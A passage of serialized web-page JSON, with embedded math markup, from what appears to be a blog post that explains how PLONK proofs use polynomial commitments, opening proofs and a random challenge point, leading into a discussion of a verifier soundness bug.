ue":21410},{"type":28,"tag":116,"props":142757,"children":142759},{"className":142758},[3705],[142760],{"type":28,"tag":116,"props":142761,"children":142763},{"className":142762,"style":92746},[3710],[142764],{"type":28,"tag":116,"props":142765,"children":142766},{},[],{"type":28,"tag":116,"props":142768,"children":142770},{"className":142769},[21380],[142771],{"type":33,"value":313},{"type":28,"tag":116,"props":142773,"children":142775},{"className":142774},[3680,21251],[142776],{"type":33,"value":18939},{"type":28,"tag":116,"props":142778,"children":142780},{"className":142779},[21401],[142781],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":142784,"children":142786},{"className":142785},[3652,3653],[142787],{"type":28,"tag":116,"props":142788,"children":142790},{"className":142789},[3658],[142791],{"type":28,"tag":116,"props":142792,"children":142794},{"className":142793,"ariaHidden":3664},[3663],[142795],{"type":28,"tag":116,"props":142796,"children":142798},{"className":142797},[3669],[142799,142803,142860,142865,142870],{"type":28,"tag":116,"props":142800,"children":142802},{"className":142801,"style":3780},[3674],[],{"type":28,"tag":116,"props":142804,"children":142806},{"className":142805},[3680],[142807,142812],{"type":28,"tag":116,"props":142808,"children":142810},{"className":142809},[3680,21251],[142811],{"type":33,"value":76422},{"type":28,"tag":116,"props":142813,"children":142815},{"className":142814},[3695],[142816],{"type":28,"tag":116,"props":142817,"children":142819},{"className":142818},[3700,21305],[142820,142849],{"type":28,"tag":116,"props":142821,"children":142823},{"className":142822},[3705],[142824,142844],{"type":28,"tag":116,"props":142825,"children":142827},{"className":142826,"style":142213},[3710],[142828],{"type":28,"tag":116,"props":142829,"children":142830},{"style":92719},[142831,142835],{"type":28,"tag":116,"props":142832,"children":142834},{"className":142833,"style":3720},[3719],[],{"type":28,"tag":116,"props":142836,"children":142838},{"className":142837},[3725,3726,3727,3728],[142839],{"type":28,"tag":116,"props":142840,"children":142842},{"className":142841},[3680,21251,3728],[142843],{"type":33,"value":117624},{"type":28,"tag":116,"props":142845,"children":142847},{"className":142846},[21407],[142848],{"type":33,"value":21410},{"type":28,"tag":116,"props":142850,"children":142852},{"className":142851},[3705],[142853],{"type":28,"tag":116,"props":142854,"children":142856},{"className":142855,"style":92746},[3710],[142857],{"type":28,"tag":116,"props":142858,"children":142859},{},[],{"type":28,"tag":116,"props":142861,"children":142863},{"className":142862},[21380],[142864],{"type":33,"value":313},{"type":28,"tag":116,"props":142866,"children":142868},{"className":142867},[3680,21251],[142869],{"type":33,"value":18939},{"type":28,"tag":116,"props":142871,"children":142873},{"className":142872},[21401],[142874],{"type":33,"value":1829},{"type":33,"value":142876},", etc., all interpolated over a domain ",{"type":28,"tag":98,"props":142878,"children":142880},{"className":142879},[3652,3653],[142881],{"type":28,"tag":116,"props":142882,"children":142884},{"className":142883},[3658],[142885],{"type":28,"tag":116,"props":142886,"children":142888},{"className":142887,"ariaHidden":3664},[3663],[142889],{"type":28,"tag":116,"props":142890,"children":142892},{"className":142891},[3669],[142893,142897],{"type":28,"tag":116,"props":142894,"children":142896},{"className":142895,"style":21246},[3674],[],{"type":28,"tag":116,"props":142898,"children":142900},{"className":142899,"style":92897},[3680,21251],[142901],{"type":33,"value":92900},{"type":33,"value":142903}," of ",{"type":28,"tag":98,"props":142905,"children":142907},{"className":142906},[3652,3653],[142908],{"type":28,"tag":116,"props":142909,"children":142911},{"className":142910},[3658],[142912],{"type":28,"tag":116,"props":142913,"children":142915},{"className":142914,"ariaHidden":3664},[3663],[142916],{"type":28,"tag":116,"props":142917,"children":142919},{"className":142918},[3669],[142920,142924],{"type":28,"tag":116,"props":142921,"children":142923},{"className":142922,"style":110501},[3674],[],{"type":28,"tag":116,"props":142925,"children":142927},{"className":142926},[3680,21251],[142928],{"type":33,"value":56022},{"type":33,"value":142930},"-th roots of unity. Evaluating ",{"type":28,"tag":98,"props":142932,"children":142934},{"className":142933},[3652,3653],[142935],{"type":28,"tag":116,"props":142936,"children":142938},{"className":142937},[3658],[142939],{"type":28,"tag":116,"props":142940,"children":142942},{"className":142941,"ariaHidden":3664},[3663],[142943],{"type":28,"tag":116,"props":142944,"children":142946},{"className":142945},[3669],[142947,142951,143008,143013,143018],{"type":28,"tag":116,"props":142948,"children":142950},{"className":142949,"style":3780},[3674],[],{"type":28,"tag":116,"props":142952,"children":142954},{"className":142953},[3680],[142955,142960],{"type":28,"tag":116,"props":142956,"children":142958},{"className":142957,"style":95017},[3680,21251],[142959],{"type":33,"value":32719},{"type":28,"tag":116,"props":142961,"children":142963},{"className":142962},[3695],[142964],{"type":28,"tag":116,"props":142965,"children":142967},{"className":142966},[3700,21305],[142968,142997],{"type":28,"tag":116,"props":142969,"children":142971},{"className":142970},[3705],[142972,142992],{"type":28,"tag":116,"props":142973,"children":142975},{"className":142974,"style":142213},[3710],[142976],{"type":28,"tag":116,"props":142977,"children":142978},{"style":95038},[142979,142983],{"type":28,"tag":116,"props":142980,"children":142982},{"className":142981,"style":3720},[3719],[],{"type":28,"tag":116,"props":142984,"children":142986},{"className":142985},[3725,3726,3727,3728],[142987],{"type":28,"tag":116,"props":142988,"children":142990},{"className":142989},[3680,21251,3728],[142991],{"type":33,"value":117624},{"type":28,"tag":116,"props":142993,"children":142995},{"className":142994},[21407],[142996],{"type":33,"value":21410},{"type":28,"tag":116,"props":142998,"children":143000},{"className":142999},[3705],[143001],{"type":28,"tag":116,"props":143002,"children":143004},{"className":143003,"style":92746},[3710],[143005],{"type":28,"tag":116,"props":143006,"children":143007},{},[],{"type":28,"tag":116,"props":143009,"children":143011},{"className":143010},[21380],[143012],{"type":33,"value":313},{"type":28,"tag":116,"props":143014,"children":143016},{"className":143015},[3680,21251],[143017],{"type":33,"value":18939},{"type":28,"tag":116,"props":143019,"children":143021},{"className":143020},[21401],[143022],{"type":33,"value":1829},{"type":33,"value":143024}," at the ",{"type":28,"tag":98,"props":143026,"children":143028},{"className":143027},[3652,3653],[143029],{"type":28,"tag":116,"props":143030,"children":143032},{"className":143031},[3658],[143033],{"type":28,"tag":116,"props":143034,"children":143036},{"className":143035,"ariaHidden":3664},[3663],[143037],{"type":28,"tag":116,"props":143038,"children":143040},{"className":143039},[3669],[143041,143045],{"type":28,"tag":116,"props":143042,"children":143044},{"className":143043,"style":141909},[3674],[],{"type":28,"tag":116,"props":143046,"children":143048},{"className":143047},[3680,21251],[143049],{"type":33,"value":3408},{"type":33,"value":143051},"-th root recovers the left wire value at row ",{"type":28,"tag":98,"props":143053,"children":143055},{"className":143054},[3652,3653],[143056],{"type":28,"tag":116,"props":143057,"children":143059},{"className":143058},[3658],[143060],{"type":28,"tag":116,"props":143061,"children":143063},{"className":143062,"ariaHidden":3664},[3663],[143064],{"type":28,"tag":116,"props":143065,"children":143067},{"className":143066},[3669],[143068,143072],{"type":28,"tag":116,"props":143069,"children":143071},{"className":143070,"style":141909},[3674],[],{"type":28,"tag":116,"props":143073,"children":143075},{"className":143074},[3680,21251],[143076],{"type":33,"value":3408},{"type":33,"value":141},{"type":28,"tag":143079,"props":143080,"children":143081},"polynomial-interpolation-panel",{},[],{"type":28,"tag":29,"props":143083,"children":143084},{},[143085,143087,143127,143129,143195,143197,143327,143329,143369,143371,143411,143413,143453,143454,143576],{"type":33,"value":143086},"Because all columns are now polynomials, the entire circuit compresses into a single master constraint polynomial ",{"type":28,"tag":98,"props":143088,"children":143090},{"className":143089},[3652,3653],[143091],{"type":28,"tag":116,"props":143092,"children":143094},{"className":143093},[3658],[143095],{"type":28,"tag":116,"props":143096,"children":143098},{"className":143097,"ariaHidden":3664},[3663],[143099],{"type":28,"tag":116,"props":143100,"children":143102},{"className":143101},[3669],[143103,143107,143112,143117,143122],{"type":28,"tag":116,"props":143104,"children":143106},{"className":143105,"style":3780},[3674],[],{"type":28,"tag":116,"props":143108,"children":143110},{"className":143109,"style":21252},[3680,21251],[143111],{"type":33,"value":121438},{"type":28,"tag":116,"props":143113,"children":143115},{"className":143114},[21380],[143116],{"type":33,"value":313},{"type":28,"tag":116,"props":143118,"children":143120},{"className":143119},[3680,21251],[143121],{"type":33,"value":18939},{"type":28,"tag":116,"props":143123,"children":143125},{"className":143124},[21401],[143126],{"type":33,"value":1829},{"type":33,"value":143128}," that combines selectors and witnesses. If the prover was honest, ",{"type":28,"tag":98,"props":143130,"children":143132},{"className":143131},[3652,3653],[143133],{"type":28,"tag":116,"props":143134,"children":143136},{"className":143135},[3658],[143137],{"type":28,"tag":116,"props":143138,"children":143140},{"className":143139,"ariaHidden":3664},[3663],[143141,143182],{"type":28,"tag":116,"props":143142,"children":143144},{"className":143143},[3669],[143145,143149,143154,143159,143164,143169,143173,143178],{"type":28,"tag":116,"props":143146,"children":143148},{"className":143147,"style":3780},[3674],[],{"type":28,"tag":116,"props":143150,"children":143152},{"className":143151,"style":21252},[3680,21251],[143153],{"type":33,"value":121438},{"type":28,"tag":116,"props":143155,"children":143157},{"className":143156},[21380],[143158],{"type":33,"value":313},{"type":28,"tag":116,"props":143160,"children":143162},{"className":143161},[3680,21251],[143163],{"type":33,"value":18939},{"type":28,"tag":116,"props":143165,"children":143167},{"className":143166},[21401],[143168],{"type":33,"value":1829},{"type":28,"tag":116,"props":143170,"children":143172},{"className":143171,"style":3857},[3759],[],{"type":28,"tag":116,"props":143174,"children":143176},{"className":143175},[3862],[143177],{"type":33,"value":373},{"type":28,"tag":116,"props":143179,"children":143181},{"className":143180,"style":3857},[3759],[],{"type":28,"tag":116,"props":143183,"children":143185},{"className":143184},[3669],[143186,143190],{"type":28,"tag":116,"props":143187,"children":143189},{"className":143188,"style":93694},[3674],[],{"type":28,"tag":116,"props":143191,"children":143193},{"className":143192},[3680],[143194],{"type":33,"value":353},{"type":33,"value":143196}," at every row index in the domain. The vanishing polynomial ",{"type":28,"tag":98,"props":143198,"children":143200},{"className":143199},[3652,3653],[143201],{"type":28,"tag":116,"props":143202,"children":143204},{"className":143203},[3658],[143205],{"type":28,"tag":116,"props":143206,"children":143208},{"className":143207,"ariaHidden":3664},[3663],[143209,143251,143314],{"type":28,"tag":116,"props":143210,"children":143212},{"className":143211},[3669],[143213,143217,143223,143228,143233,143238,143242,143247],{"type":28,"tag":116,"props":143214,"children":143216},{"className":143215,"style":3780},[3674],[],{"type":28,"tag":116,"props":143218,"children":143220},{"className":143219,"style":21782},[3680,21251],[143221],{"type":33,"value":143222},"Z",{"type":28,"tag":116,"props":143224,"children":143226},{"className":143225},[21380],[143227],{"type":33,"value":313},{"type":28,"tag":116,"props":143229,"children":143231},{"className":143230},[3680,21251],[143232],{"type":33,"value":18939},{"type":28,"tag":116,"props":143234,"children":143236},{"className":143235},[21401],[143237],{"type":33,"value":1829},{"type":28,"tag":116,"props":143239,"children":143241},{"className":143240,"style":3857},[3759],[],{"type":28,"tag":116,"props":143243,"children":143245},{"className":143244},[3862],[143246],{"type":33,"value":373},{"type":28,"tag":116,"props":143248,"children":143250},{"className":143249,"style":3857},[3759],[],{"type":28,"tag":116,"props":143252,"children":143254},{"className":143253},[3669],[143255,143260,143301,143305,143310],{"type":28,"tag":116,"props":143256,"children":143259},{"className":143257,"style":143258},[3674],"height:0.7477em;vertical-align:-0.0833em;",[],{"type":28,"tag":116,"props":143261,"children":143263},{"className":143262},[3680],[143264,143269],{"type":28,"tag":116,"props":143265,"children":143267},{"className":143266},[3680,21251],[143268],{"type":33,"value":18939},{"type":28,"tag":116,"props":143270,"children":143272},{"className":143271},[3695],[143273],{"type":28,"tag":116,"props":143274,"children":143276},{"className":143275},[3700],[143277],{"type":28,"tag":116,"props":143278,"children":143280},{"className":143279},[3705],[143281],{"type":28,"tag":116,"props":143282,"children":143284},{"className":143283,"style":108377},[3710],[143285],{"type":28,"tag":116,"props":143286,"children":143287},{"style":3714},[143288,143292],{"type":28,"tag":116,"props":143289,"children":143291},{"className":143290,"style":3720},[3719],[],{"type":28,"tag":116,"props":143293,"children":143295},{"className":143294},[3725,3726,3727,3728],[143296],{"type":28,"tag":116,"props":143297,"children":143299},{"className":143298},[3680,21251,3728],[143300],{"type":33,"value":56022},{"type":28,"tag":116,"props":143302,"children":143304},{"className":143303,"style":3760},[3759],[],{"type":28,"tag":116,"props":143306,"children":143308},{"className":143307},[3765],[143309],{"type":33,"value":3739},{"type":28,"tag":116,"props":143311,"children":143313},{"className":143312,"style":3760},[3759],[],{"type":28,"tag":116,"props":143315,"children":143317},{"className":143316},[3669],[143318,143322],{"type":28,"tag":116,"props":143319,"children":143321},{"className":143320,"style":93694},[3674],[],{"type":28,"tag":116,"props":143323,"children":143325},{"className":143324},[3680],[143326],{"type":33,"value":1824},{"type":33,"value":143328}," is zero on exactly those points, so if all constraints hold then ",{"type":28,"tag":98,"props":143330,"children":143332},{"className":143331},[3652,3653],[143333],{"type":28,"tag":116,"props":143334,"children":143336},{"className":143335},[3658],[143337],{"type":28,"tag":116,"props":143338,"children":143340},{"className":143339,"ariaHidden":3664},[3663],[143341],{"type":28,"tag":116,"props":143342,"children":143344},{"className":143343},[3669],[143345,143349,143354,143359,143364],{"type":28,"tag":116,"props":143346,"children":143348},{"className":143347,"style":3780},[3674],[],{"type":28,"tag":116,"props":143350,"children":143352},{"className":143351,"style":21782},[3680,21251],[143353],{"type":33,"value":143222},{"type":28,"tag":116,"props":143355,"children":143357},{"className":143356},[21380],[143358],{"type":33,"value":313},{"type":28,"tag":116,"props":143360,"children":143362},{"className":143361},[3680,21251],[143363],{"type":33,"value":18939},{"type":28,"tag":116,"props":143365,"children":143367},{"className":143366},[21401],[143368],{"type":33,"value":1829},{"type":33,"value":143370}," divides ",{"type":28,"tag":98,"props":143372,"children":143374},{"className":143373},[3652,3653],[143375],{"type":28,"tag":116,"props":143376,"children":143378},{"className":143377},[3658],[143379],{"type":28,"tag":116,"props":143380,"children":143382},{"className":143381,"ariaHidden":3664},[3663],[143383],{"type":28,"tag":116,"props":143384,"children":143386},{"className":143385},[3669],[143387,143391,143396,143401,143406],{"type":28,"tag":116,"props":143388,"children":143390},{"className":143389,"style":3780},[3674],[],{"type":28,"tag":116,"props":143392,"children":143394},{"className":143393,"style":21252},[3680,21251],[143395],{"type":33,"value":121438},{"type":28,"tag":116,"props":143397,"children":143399},{"className":143398},[21380],[143400],{"type":33,"value":313},{"type":28,"tag":116,"props":143402,"children":143404},{"className":143403},[3680,21251],[143405],{"type":33,"value":18939},{"type":28,"tag":116,"props":143407,"children":143409},{"className":143408},[21401],[143410],{"type":33,"value":1829},{"type":33,"value":143412},", yielding a quotient polynomial ",{"type":28,"tag":98,"props":143414,"children":143416},{"className":143415},[3652,3653],[143417],{"type":28,"tag":116,"props":143418,"children":143420},{"className":143419},[3658],[143421],{"type":28,"tag":116,"props":143422,"children":143424},{"className":143423,"ariaHidden":3664},[3663],[143425],{"type":28,"tag":116,"props":143426,"children":143428},{"className":143427},[3669],[143429,143433,143438,143443,143448],{"type":28,"tag":116,"props":143430,"children":143432},{"className":143431,"style":3780},[3674],[],{"type":28,"tag":116,"props":143434,"children":143436},{"className":143435,"style":21252},[3680,21251],[143437],{"type":33,"value":5659},{"type":28,"tag":116,"props":143439,"children":143441},{"className":143440},[21380],[143442],{"type":33,"value":313},{"type":28,"tag":116,"props":143444,"children":143446},{"className":143445},[3680,21251],[143447],{"type":33,"value":18939},{"type":28,"tag":116,"props":143449,"children":143451},{"className":143450},[21401],[143452],{"type":33,"value":1829},{"type":33,"value":21167},{"type":28,"tag":98,"props":143455,"children":143457},{"className":143456},[3652,3653],[143458],{"type":28,"tag":116,"props":143459,"children":143461},{"className":143460},[3658],[143462],{"type":28,"tag":116,"props":143463,"children":143465},{"className":143464,"ariaHidden":3664},[3663],[143466,143507,143548],{"type":28,"tag":116,"props":143467,"children":143469},{"className":143468},[3669],[143470,143474,143479,143484,143489,143494,143498,143503],{"type":28,"tag":116,"props":143471,"children":143473},{"className":143472,"style":3780},[3674],[],{"type":28,"tag":116,"props":143475,"children":143477},{"className":143476,"style":21252},[3680,21251],[143478],{"type":33,"value":121438},{"type":28,"tag":116,"props":143480,"children":143482},{"className":143481},[21380],[143483],{"type":33,"value":313},{"type":28,"tag":116,"props":143485,"children":143487},{"className":143486},[3680,21251],[143488],{"type":33,"value":18939},{"type":28,"tag":116,"props":143490,"children":143492},{"className":143491},[21401],[143493],{"type":33,"value":1829},{"type":28,"tag":116,"props":143495,"children":143497},{"className":143496,"style":3857},[3759],[],{"type":28,"tag":116,"props":143499,"children":143501},{"className":143500},[3862],[143502],{"type":33,"value":373},{"type":28,"tag":116,"props":143504,"children":143506},{"className":143505,"style":3857},[3759],[],{"type":28,"tag":116,"props":143508,"children":143510},{"className":143509},[3669],[143511,143515,143520,143525,143530,143535,143539,143544],{"type":28,"tag":116,"props":143512,"children":143514},{"className":143513,"style":3780},[3674],[],{"type":28,"tag":116,"props":143516,"children":143518},{"className":143517,"style":21252},[3680,21251],[143519],{"type":33,"value":5659},{"type":28,"tag":116,"props":143521,"children":143523},{"className":143522},[21380],[143524],{"type":33,"value":313},{"type":28,"tag":116,"props":143526,"children":143528},{"className":143527},[3680,21251],[143529],{"type":33,"value":18939},{"type":28,"tag":116,"props":143531,"children":143533},{"className":143532},[21401],[143534],{"type":33,"value":1829},{"type":28,"tag":116,"props":143536,"children":143538},{"className":143537,"style":3760},[3759],[],{"type":28,"tag":116,"props":143540,"children":143542},{"className":143541},[3765],[143543],{"type":33,"value":110922},{"type":28,"tag":116,"props":143545,"children":143547},{"className":143546,"style":3760},[3759],[],{"type":28,"tag":116,"props":143549,"children":143551},{"className":143550},[3669],[143552,143556,143561,143566,143571],{"type":28,"tag":116,"props":143553,"children":143555},{"className":143554,"style":3780},[3674],[],{"type":28,"tag":116,"props":143557,"children":143559},{"className":143558,"style":21782},[3680,21251],[143560],{"type":33,"value":143222},{"type":28,"tag":116,"props":143562,"children":143564},{"className":143563},[21380],[143565],{"type":33,"value":313},{"type":28,"tag":116,"props":143567,"children":143569},{"className":143568},[3680,21251],[143570],{"type":33,"value":18939},{"type":28,"tag":116,"props":143572,"children":143574},{"className":143573},[21401],[143575],{"type":33,"value":1829},{"type":33,"value":141},{"type":28,"tag":29,"props":143578,"children":143579},{},[143580],{"type":28,"tag":206,"props":143581,"children":143584},{"alt":143582,"src":143583},"master_equation","/posts/dusk-commitment-issues/master_equation.svg",[],{"type":28,"tag":75,"props":143586,"children":143588},{"id":143587},"polynomial-commitments-and-opening-proofs",[143589],{"type":33,"value":143590},"Polynomial commitments and opening proofs",{"type":28,"tag":29,"props":143592,"children":143593},{},[143594,143596,143601,143603,143608],{"type":33,"value":143595},"To keep the proof short, the prover doesn't send polynomials directly. Instead, it sends ",{"type":28,"tag":2583,"props":143597,"children":143598},{},[143599],{"type":33,"value":143600},"commitments",{"type":33,"value":143602},", short cryptographic fingerprints of each polynomial (using e.g. KZG commitments). When the verifier needs the value of a committed polynomial at a specific point, the prover provides the value along with an ",{"type":28,"tag":2583,"props":143604,"children":143605},{},[143606],{"type":33,"value":143607},"opening proof",{"type":33,"value":143609}," that the claimed value is consistent with the earlier commitment.",{"type":28,"tag":29,"props":143611,"children":143612},{},[143613],{"type":33,"value":143614},"A committed polynomial evaluation is therefore cryptographically bound, and the prover cannot lie about the value without being caught.",{"type":28,"tag":75,"props":143616,"children":143618},{"id":143617},"reducing-to-a-single-random-point",[143619],{"type":33,"value":143620},"Reducing to a single random point",{"type":28,"tag":29,"props":143622,"children":143623},{},[143624,143626,143666,143668,143693,143695,143817,143819,143844],{"type":33,"value":143625},"After the prover commits to all polynomials, including ",{"type":28,"tag":98,"props":143627,"children":143629},{"className":143628},[3652,3653],[143630],{"type":28,"tag":116,"props":143631,"children":143633},{"className":143632},[3658],[143634],{"type":28,"tag":116,"props":143635,"children":143637},{"className":143636,"ariaHidden":3664},[3663],[143638],{"type":28,"tag":116,"props":143639,"children":143641},{"className":143640},[3669],[143642,143646,143651,143656,143661],{"type":28,"tag":116,"props":143643,"children":143645},{"className":143644,"style":3780},[3674],[],{"type":28,"tag":116,"props":143647,"children":143649},{"className":143648,"style":21252},[3680,21251],[143650],{"type":33,"value":5659},{"type":28,"tag":116,"props":143652,"children":143654},{"className":143653},[21380],[143655],{"type":33,"value":313},{"type":28,"tag":116,"props":143657,"children":143659},{"className":143658},[3680,21251],[143660],{"type":33,"value":18939},{"type":28,"tag":116,"props":143662,"children":143664},{"className":143663},[21401],[143665],{"type":33,"value":1829},{"type":33,"value":143667},", the verifier picks a random challenge point ",{"type":28,"tag":98,"props":143669,"children":143671},{"className":143670},[3652,3653],[143672],{"type":28,"tag":116,"props":143673,"children":143675},{"className":143674},[3658],[143676],{"type":28,"tag":116,"props":143677,"children":143679},{"className":143678,"ariaHidden":3664},[3663],[143680],{"type":28,"tag":116,"props":143681,"children":143683},{"className":143682},[3669],[143684,143688],{"type":28,"tag":116,"props":143685,"children":143687},{"className":143686,"style":110501},[3674],[],{"type":28,"tag":116,"props":143689,"children":143691},{"className":143690,"style":113217},[3680,21251],[143692],{"type":33,"value":113220},{"type":33,"value":143694}," (derived via the Fiat-Shamir heuristic from the transcript) and checks ",{"type":28,"tag":98,"props":143696,"children":143698},{"className":143697},[3652,3653],[143699],{"type":28,"tag":116,"props":143700,"children":143702},{"className":143701},[3658],[143703],{"type":28,"tag":116,"props":143704,"children":143706},{"className":143705,"ariaHidden":3664},[3663],[143707,143748,143789],{"type":28,"tag":116,"props":143708,"children":143710},{"className":143709},[3669],[143711,143715,143720,143725,143730,143735,143739,143744],{"type":28,"tag":116,"props":143712,"children":143714},{"className":143713,"style":3780},[3674],[],{"type":28,"tag":116,"props":143716,"children":143718},{"className":143717,"style":21252},[3680,21251],[143719],{"type":33,"value":121438},{"type":28,"tag":116,"props":143721,"children":143723},{"className":143722},[21380],[143724],{"type":33,"value":313},{"type":28,"tag":116,"props":143726,"children":143728},{"className":143727,"style":113217},[3680,21251],[143729],{"type":33,"value":113220},{"type":28,"tag":116,"props":143731,"children":143733},{"className":143732},[21401],[143734],{"type":33,"value":1829},{"type":28,"tag":116,"props":143736,"children":143738},{"className":143737,"style":3857},[3759],[],{"type":28,"tag":116,"props":143740,"children":143742},{"className":143741},[3862],[143743],{"type":33,"value":373},{"type":28,"tag":116,"props":143745,"children":143747},{"className":143746,"style":3857},[3759],[],{"type":28,"tag":116,"props":143749,"children":143751},{"className":143750},[3669],[143752,143756,143761,143766,143771,143776,143780,143785],{"type":28,"tag":116,"props":143753,"children":143755},{"className":143754,"style":3780},[3674],[],{"type":28,"tag":116,"props":143757,"children":143759},{"className":143758,"style":21252},[3680,21251],[143760],{"type":33,"value":5659},{"type":28,"tag":116,"props":143762,"children":143764},{"className":143763},[21380],[143765],{"type":33,"value":313},{"type":28,"tag":116,"props":143767,"children":143769},{"className":143768,"style":113217},[3680,21251],[143770],{"type":33,"value":113220},{"type":28,"tag":116,"props":143772,"children":143774},{"className":143773},[21401],[143775],{"type":33,"value":1829},{"type":28,"tag":116,"props":143777,"children":143779},{"className":143778,"style":3760},[3759],[],{"type":28,"tag":116,"props":143781,"children":143783},{"className":143782},[3765],[143784],{"type":33,"value":110922},{"type":28,"tag":116,"props":143786,"children":143788},{"className":143787,"style":3760},[3759],[],{"type":28,"tag":116,"props":143790,"children":143792},{"className":143791},[3669],[143793,143797,143802,143807,143812],{"type":28,"tag":116,"props":143794,"children":143796},{"className":143795,"style":3780},[3674],[],{"type":28,"tag":116,"props":143798,"children":143800},{"className":143799,"style":21782},[3680,21251],[143801],{"type":33,"value":143222},{"type":28,"tag":116,"props":143803,"children":143805},{"className":143804},[21380],[143806],{"type":33,"value":313},{"type":28,"tag":116,"props":143808,"children":143810},{"className":143809,"style":113217},[3680,21251],[143811],{"type":33,"value":113220},{"type":28,"tag":116,"props":143813,"children":143815},{"className":143814},[21401],[143816],{"type":33,"value":1829},{"type":33,"value":143818}," at that single point. By the Schwartz-Zippel lemma, if this holds at a random ",{"type":28,"tag":98,"props":143820,"children":143822},{"className":143821},[3652,3653],[143823],{"type":28,"tag":116,"props":143824,"children":143826},{"className":143825},[3658],[143827],{"type":28,"tag":116,"props":143828,"children":143830},{"className":143829,"ariaHidden":3664},[3663],[143831],{"type":28,"tag":116,"props":143832,"children":143834},{"className":143833},[3669],[143835,143839],{"type":28,"tag":116,"props":143836,"children":143838},{"className":143837,"style":110501},[3674],[],{"type":28,"tag":116,"props":143840,"children":143842},{"className":143841,"style":113217},[3680,21251],[143843],{"type":33,"value":113220},{"type":33,"value":143845}," then the full polynomial identity holds with overwhelming probability, so the verifier checks the entire multi-million-row circuit in constant time.",{"type":28,"tag":29,"props":143847,"children":143848},{},[143849,143851,143876,143878,143883],{"type":33,"value":143850},"In textbook PLONK the selector polynomials are part of the fixed circuit description, but in practice implementations commit to them during preprocessing and place those commitments in the verifier key. When the verifier later needs their values at ",{"type":28,"tag":98,"props":143852,"children":143854},{"className":143853},[3652,3653],[143855],{"type":28,"tag":116,"props":143856,"children":143858},{"className":143857},[3658],[143859],{"type":28,"tag":116,"props":143860,"children":143862},{"className":143861,"ariaHidden":3664},[3663],[143863],{"type":28,"tag":116,"props":143864,"children":143866},{"className":143865},[3669],[143867,143871],{"type":28,"tag":116,"props":143868,"children":143870},{"className":143869,"style":110501},[3674],[],{"type":28,"tag":116,"props":143872,"children":143874},{"className":143873,"style":113217},[3680,21251],[143875],{"type":33,"value":113220},{"type":33,"value":143877},", the prover supplies ",{"type":28,"tag":2583,"props":143879,"children":143880},{},[143881],{"type":33,"value":143882},"evaluation claims",{"type":33,"value":143884}," that must be checked against those commitments with opening proofs.",{"type":28,"tag":29,"props":143886,"children":143887},{},[143888,143890,143894],{"type":33,"value":143889},"The security argument depends on a chain: commitments lock the prover into polynomials ",{"type":28,"tag":2583,"props":143891,"children":143892},{},[143893],{"type":33,"value":104204},{"type":33,"value":143895}," challenges are derived, and opening proofs ensure the evaluations are consistent with those commitments. Breaking any single link in this chain collapses soundness entirely.",{"type":28,"tag":75,"props":143897,"children":143899},{"id":143898},"what-the-verifier-is-actually-allowed-to-trust",[143900],{"type":33,"value":143901},"What the verifier is actually allowed to trust",{"type":28,"tag":29,"props":143903,"children":143904},{},[143905,143907,143912],{"type":33,"value":143906},"For this bug, one invariant matters more than the rest: ",{"type":28,"tag":4995,"props":143908,"children":143909},{},[143910],{"type":33,"value":143911},"every scalar that enters the final verifier equation must be either locally computed by the verifier, or cryptographically tied to an earlier commitment",{"type":33,"value":141},{"type":28,"tag":29,"props":143914,"children":143915},{},[143916,143918,144010,144011,144103,144105,144130,144132,144172,144173,144213,144214,144307,144308,144354,144356,144443,144444,144531,144532,144619],{"type":33,"value":143917},"In practice, values entering the verifier equation fall into three buckets. The verifier computes some values locally from public data (",{"type":28,"tag":98,"props":143919,"children":143921},{"className":143920},[3652,3653],[143922],{"type":28,"tag":116,"props":143923,"children":143925},{"className":143924},[3658],[143926],{"type":28,"tag":116,"props":143927,"children":143929},{"className":143928,"ariaHidden":3664},[3663],[143930],{"type":28,"tag":116,"props":143931,"children":143933},{"className":143932},[3669],[143934,143938,143995,144000,144005],{"type":28,"tag":116,"props":143935,"children":143937},{"className":143936,"style":3780},[3674],[],{"type":28,"tag":116,"props":143939,"children":143941},{"className":143940},[3680],[143942,143947],{"type":28,"tag":116,"props":143943,"children":143945},{"className":143944,"style":21782},[3680,21251],[143946],{"type":33,"value":143222},{"type":28,"tag":116,"props":143948,"children":143950},{"className":143949},[3695],[143951],{"type":28,"tag":116,"props":143952,"children":143954},{"className":143953},[3700,21305],[143955,143984],{"type":28,"tag":116,"props":143956,"children":143958},{"className":143957},[3705],[143959,143979],{"type":28,"tag":116,"props":143960,"children":143962},{"className":143961,"style":142213},[3710],[143963],{"type":28,"tag":116,"props":143964,"children":143965},{"style":115909},[143966,143970],{"type":28,"tag":116,"props":143967,"children":143969},{"className":143968,"style":3720},[3719],[],{"type":28,"tag":116,"props":143971,"children":143973},{"className":143972},[3725,3726,3727,3728],[143974],{"type":28,"tag":116,"props":143975,"children":143977},{"className":143976,"style":92897},[3680,21251,3728],[143978],{"type":33,"value":92900},{"type":28,"tag":116,"props":143980,"children":143982},{"className":143981},[21407],[143983],{"type":33,"value":21410},{"type":28,"tag":116,"props":143985,"children":143987},{"className":143986},[3705],[143988],{"type":28,"tag":116,"props":143989,"children":143991},{"className":143990,"style":92746},[3710],[143992],{"type":28,"tag":116,"props":143993,"children":143994},{},[],{"type":28,"tag":116,"props":143996,"children":143998},{"className":143997},[21380],[143999],{"type":33,"value":313},{"type":28,"tag":116,"props":144001,"children":144003},{"className":144002,"style":113217},[3680,21251],[144004],{"type":33,"value":113220},{"type":28,"tag":116,"props":144006,"children":144008},{"className":144007},[21401],[144009],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":144012,"children":144014},{"className":144013},[3652,3653],[144015],{"type":28,"tag":116,"props":144016,"children":144018},{"className":144017},[3658],[144019],{"type":28,"tag":116,"props":144020,"children":144022},{"className":144021,"ariaHidden":3664},[3663],[144023],{"type":28,"tag":116,"props":144024,"children":144026},{"className":144025},[3669],[144027,144031,144088,144093,144098],{"type":28,"tag":116,"props":144028,"children":144030},{"className":144029,"style":3780},[3674],[],{"type":28,"tag":116,"props":144032,"children":144034},{"className":144033},[3680],[144035,144040],{"type":28,"tag":116,"props":144036,"children":144038},{"className":144037},[3680,21251],[144039],{"type":33,"value":117624},{"type":28,"tag":116,"props":144041,"children":144043},{"className":144042},[3695],[144044],{"type":28,"tag":116,"props":144045,"children":144047},{"className":144046},[3700,21305],[144048,144077],{"type":28,"tag":116,"props":144049,"children":144051},{"className":144050},[3705],[144052,144072],{"type":28,"tag":116,"props":144053,"children":144055},{"className":144054,"style":92715},[3710],[144056],{"type":28,"tag":116,"props":144057,"children":144058},{"style":92719},[144059,144063],{"type":28,"tag":116,"props":144060,"children":14